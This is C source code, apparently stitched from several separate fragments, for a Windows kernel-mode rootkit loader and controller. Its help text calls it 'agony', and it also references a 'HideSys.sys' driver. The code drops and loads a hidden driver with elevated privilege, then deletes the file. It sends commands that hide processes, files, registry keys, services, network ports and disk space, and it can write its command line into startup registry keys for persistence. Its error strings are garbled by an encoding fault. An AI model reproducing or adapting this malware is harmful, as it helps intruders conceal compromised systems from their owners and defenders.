void CDriverManager::InitializeDriver()
{
m_strDriverPath = GetSystemDir();
m_strDriverPath += L"\\HideSys.sys";
ExtractSysFile();
}
void LoadAndRun()
{
char filePath[MAX_PATH] = {0};
//char LoadDriverPath[MAX_PATH] = {0};
//char ServicesName[MAX_PATH] = {0};
GetSystemDirectory(filePath,sizeof(filePath));
strcat_s(filePath,"\\");
strcat_s(filePath,SYS_NAME);
strcat_s(filePath,".sys");
//sprintf_s(ServicesName,MAX_PATH,"SYSTEM\\CurrentControlSet\\Services\\%s",SYS_NAME);
//SHDeleteKey(HKEY_LOCAL_MACHINE,ServicesName);
ExtractSysFile(filePath,KernelModule,sizeof(KernelModule));
if (GetFileAttributes(filePath) == INVALID_FILE_ATTRIBUTES)
{
ShowERR("ÊÍ·ÅÎļþʧ°Ü.");
ExitProcess(0);
}
//sprintf_s(LoadDriverPath,MAX_PATH,"\\??\\%s",filePath);
if (!EnableDebugPriv(SE_LOAD_DRIVER_NAME))
{
ShowERR("ȨÏÞ²»¹».");
ExitProcess(0);
}
if (!LoadNTDriver(SYS_NAME,filePath))
{
DeleteFile(filePath);
//SHDeleteKey(HKEY_LOCAL_MACHINE,ServicesName);
ExitProcess(0);
}
if (!StartDriver(SYS_NAME))
{
ShowERR("Æô¶¯Ê§°Ü.");
DeleteFile(filePath);
//SHDeleteKey(HKEY_LOCAL_MACHINE,ServicesName);
ExitProcess(0);
}
DeleteFile(filePath);
Init();
}
int main(int argc,char **argv)
{
HANDLE SCManager = 0;
HANDLE service = 0;
HANDLE device = 0;
SERVICE_STATUS status;
int i=1,j;
char sysfilepath[256];
char devicepath[256];
char ret[1024];
WCHAR ToSend[512];
DWORD code, bytes;
char DriveLetter;
unsigned short port;
unsigned long space;
if( argc<2 ) {
usage(argv[0]);
return 0;
}
// get sysfile path
GetCurrentDirectory(sizeof(sysfilepath), sysfilepath);
strcat( sysfilepath, "\\\\" );
strcat( sysfilepath, SYSFILE );
if( !FileExists( sysfilepath ) && strcmp(argv[1],"-stop") && strcmp(argv[1],"-h") ) {
printf("extracting .sys...\n");
if( !ExtractSysFile() ) {
printf("cannot extract sys file...\n");
return 0;
}
}
// MultiByteToWideChar(CP_ACP, 0, argv[4], -1, ToSend, sizeof(ToSend));
SCManager = OpenSCManager(NULL,NULL,SC_MANAGER_CREATE_SERVICE);
if(SCManager) {
service = CreateService(SCManager, SERVICENAME, SERVICENAME, SERVICE_ALL_ACCESS,
SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START,SERVICE_ERROR_NORMAL,
sysfilepath, NULL,NULL,NULL,NULL,NULL);
if(!service) // if we cannot create it, maybe he is already existing
service = OpenService(SCManager,SERVICENAME, SERVICE_ALL_ACCESS);
if(service)
StartService(service, 0, NULL);
else
printf("cannot create/open the service\n");
}
else
printf("cannot open the service manager\n");
sprintf(devicepath,"\\\\.\\Global\\%s\0",DEVICE);
device = CreateFile(devicepath,GENERIC_READ|GENERIC_WRITE,0,NULL,OPEN_EXISTING,0,NULL);
if( !device || device==INVALID_HANDLE_VALUE ) {
printf("cannot communicate with the driver.\n");
CloseServiceHandle(service);
CloseServiceHandle(SCManager);
return 0;
}
if( !strcmp(argv[1], "-stop")) {
// stop & uninstall service
// clean startup reg keys
fix( NULL, FALSE );
// delete VOLUME.INI files
DeleteAllSpaceFiles();
if( device )
CloseHandle( device );
if( service ) {
ControlService(service, SERVICE_CONTROL_STOP,&status);
DeleteService(service);
CloseServiceHandle(service);
}
if( SCManager )
CloseServiceHandle(SCManager);
return 0;
}
if( !strcmp(argv[1], "-h")) {
printf("all options \"cumulables\" in a same command line\n");
printf("for exemple: agony -p process1.exe process2.exe will hide 2 process\n");
printf("we can accumulate different options on a same line:\n");
printf("%s -p process.exe process2.exe -s service1 -f process1.exe process2.exe\n",argv[0]);
printf("we can also choose to launch our command one by one\n\n");
printf("for the -space option, the syntax is:\n");
printf("%s -space volume_letter:space_to_hide_in_MB\n",argv[0]);
printf("we can cumulate for option -space, like other options:\n");
printf("%s -space C:5000 D:1000 F:5500\n",argv[0]);
return 0;
}
code = NO_MSG;
while( i < argc ) {
if( !strcmp(argv[i],"-p") ) {
code = PROCESS_CODE;
i++; continue;
}
if( !strcmp(argv[i],"-f") ) {
code = FILE_CODE;
i++; continue;
}
if( !strcmp( argv[i], "-k" ) ) {
code = REGKEY_CODE;
i++; continue;
}
if( !strcmp( argv[i], "-v" ) ) {
code = REGVALUE_CODE;
i++; continue;
}
if( !strcmp( argv[i], "-s" ) ) {
code = SERVICE_CODE;
i++; continue;
}
if( !strcmp( argv[i], "-tcp" ) ) {
code = TCP_PORT_CODE;
i++; continue;
}
if( !strcmp( argv[i], "-udp" ) ) {
code = UDP_PORT_CODE;
i++; continue;
}
if( !strcmp( argv[i], "-space" ) ) {
code = DISK_SPACE_CODE;
i++; continue;
}
if( !strcmp( argv[i], "-r" ) ) {
// we get the initial cmdline
ret[0] = '\0';
for(j=1; j<argc; j++) {
strcat(ret, " ");
strcat(ret, argv[j]);
}
fix(ret, TRUE);
i++; continue;
}
if( code == DISK_SPACE_CODE ) {
DriveLetter = argv[i][0];
space = atoi( argv[i]+2 );
if(!CreateSpaceFile(DriveLetter,space))
printf("volume %c space will not be falsificated\n", DriveLetter);
// we launch the hook and we hide the VOLUME.INI file
DeviceIoControl(device, CODEMSG(DISK_SPACE_CODE), LSPACEFILENAME, sizeof(LSPACEFILENAME),
&ret, sizeof(ret),&bytes,NULL);
DeviceIoControl(device, CODEMSG(FILE_CODE), LSPACEFILENAME, sizeof(LSPACEFILENAME),
&ret, sizeof(ret),&bytes,NULL);
}
else if( code == TCP_PORT_CODE || code == UDP_PORT_CODE ) {
port = atoi( argv[i] );
DeviceIoControl(device, CODEMSG(code), &port, sizeof(port),
&ret, sizeof(ret),&bytes,NULL);
}
else {
// convert the arg to wide char before sending
MultiByteToWideChar(CP_ACP, 0, argv[i], -1, ToSend, sizeof(ToSend));
DeviceIoControl(device, CODEMSG(code), ToSend, (wcslen(ToSend)+1)*2,
&ret, sizeof(ret),&bytes,NULL);
}
i++;
}
CloseHandle( device );
if( service )
CloseServiceHandle(service);
if( SCManager )
CloseServiceHandle(SCManager);
return 0;
}